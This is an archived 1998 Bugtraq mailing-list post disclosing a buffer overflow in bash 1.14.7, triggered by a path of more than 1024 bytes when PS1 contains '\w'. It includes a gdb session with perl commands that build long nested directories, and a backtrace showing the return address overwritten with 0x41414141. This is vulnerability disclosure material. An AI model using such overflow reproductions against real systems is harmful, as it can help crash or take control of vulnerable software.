Bugtraq mailing list archives

Buffer overflow in bash 1.14.7(1)

From: root () EINSTEIN DHIS EU ORG (Joao Manuel Carolino)
Date: Fri, 4 Sep 1998 16:09:28 +0000


If you cd in to a directory which has a path name larger than 1024 bytes
and you have '\w' included in your PS1 environment variable (which makes
the path to the current working directory appear in each command line
prompt), a buffer overflow will occur.
The following was tested on my machine, running Slackware 3.5:

einstein:~# gdb bash
[...]
(gdb) r
Starting program: /bin/bash
bash# PS1='\w '
~ cd /tmp
/tmp mkdir `perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`
/tmp mkdir `perl -e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl
-e 'print "A" x 255'`/`perl -e 'print "A" x 255'`/`perl -e 'print "A" x
255'`
/tmp cd
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x804ed72 in sigprocmask ()
(gdb) backtrace
#0  0x804ed72 in sigprocmask ()
#1  0xe9 in ?? ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.

                                        Regards,
                                                Joao

Current thread:

Buffer overflow in bash 1.14.7(1) Joao Manuel Carolino (Sep 04)
- Re: Buffer overflow in bash 1.14.7(1) Michael Riepe (Sep 05)
- Re: Buffer overflow in bash 1.14.7(1) Wichert Akkerman (Sep 05)
  - Re: Buffer overflow in bash 1.14.7(1) Chet Ramey (Sep 08)
- sshd exploit? Navindra Umanee (Sep 05)
  - Re: sshd exploit? Seth David Schoen (Sep 06)
  - Reading read-protected devices in *BSD Hubert Feyrer (Sep 06)
    - Re: Reading read-protected devices in *BSD Todd C. Miller (Sep 06)
    - Re: Reading read-protected devices in *BSD Eivind Eklund (Sep 06)
- Another way to crash HP 5M/5N printers bwoodard () CISCO COM (Sep 05)
- Windows File Share Scanner ZyklonB Zombie (Sep 05)

(Thread continues...)